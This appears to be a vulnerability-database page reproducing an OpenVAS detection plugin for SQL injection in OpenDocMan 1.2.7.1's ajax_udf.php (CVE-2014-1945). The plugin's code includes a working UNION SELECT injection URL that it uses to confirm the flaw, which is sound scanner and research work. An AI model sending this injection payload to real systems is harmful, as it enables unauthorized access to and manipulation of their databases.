OpenDocMan 'ajax_udf.php' Multiple SQL Injection Vulnerabilities
🗓️ 11 Mar 2014 00:00:00Reported by Copyright (C) 2014 Greenbone AGType
openvas🔗 plugins.openvas.org👁 45 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| OpenDocMan 1.2.7 - Multiple Vulnerabilities | 5 Mar 201400:00 | – | zdt | |
| CVE-2014-1945 | 7 Mar 201420:00 | – | cve | |
| CVE-2014-1945 | 7 Mar 201420:00 | – | cvelist | |
| OpenDocMan 1.2.7 - Multiple Vulnerabilities | 5 Mar 201400:00 | – | exploitdb | |
| EUVD-2014-1999 | 7 Oct 202500:30 | – | euvd | |
| OpenDocMan 1.2.7 - Multiple Vulnerabilities | 5 Mar 201400:00 | – | exploitpack | |
| Multiple Vulnerabilities in OpenDocMan | 12 Feb 201400:00 | – | htbridge | |
| CVE-2014-1945 | 9 Mar 201413:16 | – | nvd | |
| OpenDocMan 1.2.7 SQL Injection / Access Control | 6 Mar 201400:00 | – | packetstorm | |
| Sql injection | 9 Mar 201413:16 | – | prion |
10
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/65775 |
# SPDX-FileCopyrightText: 2014 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:opendocman:opendocman";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.103913");
script_cve_id("CVE-2014-1945");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_version("2023-07-26T05:05:09+0000");
script_name("OpenDocMan 'ajax_udf.php' Multiple SQL Injection Vulnerabilities");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/65775");
script_tag(name:"last_modification", value:"2023-07-26 05:05:09 +0000 (Wed, 26 Jul 2023)");
script_tag(name:"creation_date", value:"2014-03-11 15:18:54 +0100 (Tue, 11 Mar 2014)");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_family("Web application abuses");
script_copyright("Copyright (C) 2014 Greenbone AG");
script_dependencies("secpod_opendocman_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("OpenDocMan/installed");
script_tag(name:"impact", value:"An attacker can exploit these issues by manipulating the SQL query
logic to carry out unauthorized actions on the underlying database.");
script_tag(name:"vuldetect", value:"Try to inject SQL code.");
script_tag(name:"insight", value:"The vulnerability exists due to insufficient validation
of 'add_value' HTTP GET parameter in '/ajax_udf.php'.");
script_tag(name:"solution", value:"Updates are available. Please see the references or vendor advisory
for more information.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"OpenDocMan is prone to multiple SQL-injection vulnerabilities because
it fails to sufficiently sanitize user-supplied data.");
script_tag(name:"affected", value:"OpenDocMan 1.2.7.1 is vulnerable. Other versions may also be affected.");
exit(0);
}
include("http_func.inc");
include("host_details.inc");
include("http_keepalive.inc");
if( ! port = get_app_port( cpe:CPE) ) exit( 0 );
if( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );
url = dir + '/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,0x53514c2d496e6a656374696f6e2d54657374,3,4,5,6,7,8,9';
if( http_vuln_check(port:port, url:url, pattern:"SQL-Injection-Test" ) )
{
security_message(port:port);
exit(0);
}
exit(0);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Jul 2023 00:00Current
8.9High risk
Vulners AI Score8.9
CVSS 27.5
EPSS0.0131